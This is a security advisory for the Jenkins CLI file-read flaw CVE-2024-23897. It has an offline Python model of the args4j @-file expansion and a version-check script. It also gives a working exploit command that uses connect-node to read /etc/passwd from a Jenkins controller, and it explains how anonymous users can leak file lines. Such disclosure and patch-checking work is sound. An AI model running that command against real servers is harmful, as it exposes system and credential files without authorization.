CVE-2024-23897
Data Leak Vulnerability
Fixed in: version 2.442 and LTS 2.426.3
Vulnerability Overview
The Jenkins CLI contains a critical arbitrary file read flaw. It stems from how Jenkins parses the arguments of CLI commands with the args4j library: args4j's expandAtFiles feature treats an argument beginning with @ as a file to read, and Jenkins exposed that behaviour to remote CLI users.
Technical Details
The vulnerable code path is reached whenever Jenkins parses the arguments of a CLI command with args4j. The library's expandAtFiles method checks whether an argument begins with the @ symbol. When it does, the rest of the argument is treated as a file path on the Jenkins controller, the file is read, and the original argument is replaced by the file's contents, with each line becoming a separate argument. This is intended as a convenience for long argument lists, but Jenkins passed attacker-supplied CLI arguments straight into it.
This creates a security gap: "if an attacker can control an argument, they can expand it to an arbitrary number of ones from an arbitrary file on the Jenkins instance."
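The expansion described above, as an added example that is not Jenkins's or args4j's own code: expand_at_files models the @-file behaviour the text describes, parse_literal is the hardened variant with @-syntax disabled, and connect_node is a constructed stand-in for a command that reports each unknown node name in an error message, which is what turns the expansion into disclosure. The sample file contents are constructed and written to a temporary file so the example runs offline.

```python
import os
import tempfile

# Constructed sample standing in for a sensitive file on the Jenkins controller.
SAMPLE_SECRET = "line-one-secret\nline-two-secret\nline-three-secret\n"


def expand_at_files(args):
    """Vulnerable expansion, modelled on the args4j @-file syntax the page
    describes: an argument beginning with '@' names a file whose lines each
    become a separate argument. The path is used verbatim, so whoever
    controls the argument chooses the file."""
    result = []
    for arg in args:
        if arg.startswith("@"):
            path = arg[1:]
            if not os.path.exists(path):
                raise ValueError(f"No such file: {path}")
            with open(path, encoding="utf-8", errors="replace") as fh:
                result.extend(line.rstrip("\r\n") for line in fh)
        else:
            result.append(arg)
    return result


def parse_literal(args):
    """Hardened variant: @-syntax disabled, every argument is taken literally."""
    return list(args)


def connect_node(args, known_nodes=frozenset()):
    """Constructed model (not the real Jenkins command) of a command that
    echoes every unrecognised node name in an error message."""
    out = []
    for name in args:
        out.append(f"connected {name}" if name in known_nodes
                   else f"No such node '{name}'")
    return out


def demo(secret_text=SAMPLE_SECRET):
    """Run one attacker-controlled argument through both parsers and return
    what the command would report in each case."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret_text)
        path = fh.name
    try:
        attacker_arg = "@" + path
        vulnerable = connect_node(expand_at_files([attacker_arg]))
        hardened = connect_node(parse_literal([attacker_arg]))
    finally:
        os.unlink(path)
    return vulnerable, hardened


if __name__ == "__main__":
    vuln, hard = demo()
    print("vulnerable parser:", *vuln, sep="\n  ")
    print("hardened parser:", *hard, sep="\n  ")
```

With the vulnerable parser the single argument becomes three node names and all three lines of the file come back in error messages; with @-syntax disabled the command sees one literal name and the file is never opened.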
Exploitation Methods
For Authenticated Users: Attackers with Overall/Read permission (which any authenticated user has by default) can retrieve complete file contents by passing an @-prefixed file path as an argument to a CLI command, for example:

java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins \
-auth abc:abc connect-node "@/etc/passwd"

Each line of /etc/passwd becomes a separate node name, and connect-node reports every name it does not recognize, so the whole file is echoed back to the attacker.

For Unauthenticated Users: Attackers without Overall/Read permission, including anonymous users where anonymous read access is disabled, can still read the first few lines of a file, one line at a time. Commands handle their arguments differently and echo different positional arguments in their error output, so each command may disclose a different line of the targeted file; how many lines are reachable depends on which CLI commands are available.
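A version check against the fixed releases listed at the top of the page, added here as an example rather than taken from Jenkins or its advisory. It assumes the version string has already been obtained (Jenkins reports it in the X-Jenkins response header) and that LTS releases carry three numeric components while weekly releases carry two, which is how the two lines are told apart.

```python
FIXED_WEEKLY = (2, 442)     # weekly line, per the page header
FIXED_LTS = (2, 426, 3)     # LTS line, per the page header


def parse_version(text):
    """Parse a Jenkins version string such as '2.426.2' into an int tuple.
    A '-SNAPSHOT'-style suffix is dropped (assumption: only digits matter)."""
    core = text.strip().split("-")[0]
    parts = tuple(int(p) for p in core.split("."))
    if len(parts) not in (2, 3):
        raise ValueError(f"unrecognised Jenkins version: {text!r}")
    return parts


def is_affected(version_text):
    """True when the version is older than the fixed release of its line.
    Three components (2.426.2) means LTS, two components (2.441) means weekly,
    so each is compared against its own fix version."""
    version = parse_version(version_text)
    fixed = FIXED_LTS if len(version) == 3 else FIXED_WEEKLY
    return version < fixed


if __name__ == "__main__":
    for sample in ("2.441", "2.442", "2.426.2", "2.426.3", "2.414.3", "2.440.1"):
        print(sample, "affected" if is_affected(sample) else "fixed")
```

Note that the check is purely version-based; it does not tell you whether the CLI is reachable or whether anonymous read access is enabled, both of which change what an attacker can read.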
Reference
This vulnerability disclosure credits SonarSource's security research.